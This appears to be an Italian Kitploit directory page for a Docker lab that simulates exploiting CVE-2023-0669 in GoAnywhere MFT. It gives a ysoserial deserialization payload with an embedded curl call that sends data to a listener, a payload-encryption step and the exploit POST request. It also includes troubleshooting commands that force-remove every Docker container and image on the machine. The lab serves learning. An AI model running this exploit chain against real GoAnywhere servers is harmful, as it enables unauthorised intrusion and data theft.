Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/zakaria-laouani/cve-2023-0669-simulation
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebEsfiltrazione DatiCommand and Control
GitHubzakaria-laouani/cve-2023-0669-simulation

cve-2023-0669-simulation

Ambiente di simulazione per CVE-2023-0669 con container attacker basati su Docker, server vulnerabile e container listener. Mostra la generazione di exploit di deserializzazione, crittografia del payload e esfiltrazione dei dati.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
78 mesi faNon ancora revisionato
Condividi

Struttura del progetto

cve-2023-0669-simulation/ ├── docker-compose.yml ├── attacker/ │ ├── Dockerfile │ └── CVE_2023_0669_helper.java ├── vulnerable/ │ ├── Dockerfile │ └── VulnerableServer.java ├── listener/ │ ├── Dockerfile │ └── server.py └── received/ ← creato automaticamente (exfiltrazione)

2. Avvia i 3 container (attaccante, vulnerabile, listener)

docker-compose up --build

Problema: errore KeyError: 'ContainerConfig' durante docker compose up

questo progetto richiede:

  • Docker Engine: v24 o v25 minimo
  • Docker Compose: v2.20+ (incluso automaticamente con Docker) KeyError: 'ContainerConfig' durante docker compose up Ciò proviene generalmente da metadati Docker obsoleti o corrotti, o da immagini vecchie. Elimina i container, le immagini e i metadati danneggiati:

docker compose down --remove-orphans

docker rm -f $(docker ps -aq)

docker rmi -f $(docker images -q)

Poi ricostruisci correttamente:

docker compose build --no-cache

docker compose up

3. Entra nel container dell'attaccante

docker exec -it attacker bash

Generazione del payload safe (invia solo un messaggio)```

java -jar ysoserial-all.jar CommonsCollections6 'curl -s http://listener:8080/receive -d "PWNED-CVE-2023-0669-simulation-$(date)"' > payload.ser

Cifratura del payload

java CVE_2023_0669_helper payload.ser 1

→ Copia l'intera lunga stringa che viene visualizzata (Ctrl+A poi Ctrl+C)

Invio dell'exploit (sostituisci LA_CHAINE con quello che hai appena copiato)

curl -X POST http://vulnerable:8001/goanywhere/lic/accept
-d "encryptedLicenseResponseData=LA_CHAÎNE_BASE64_ICI"
-d "acceptLicense=true"

7. Risultato immediato

Vedrai nei log del listener (o nella cartella ./received sul tuo PC):

PWNED ! Ricevuti 42 bytes → PWNED-CVE-2023-0669-simulation-Sat 06 Dec 2025...

Scarica lo strumento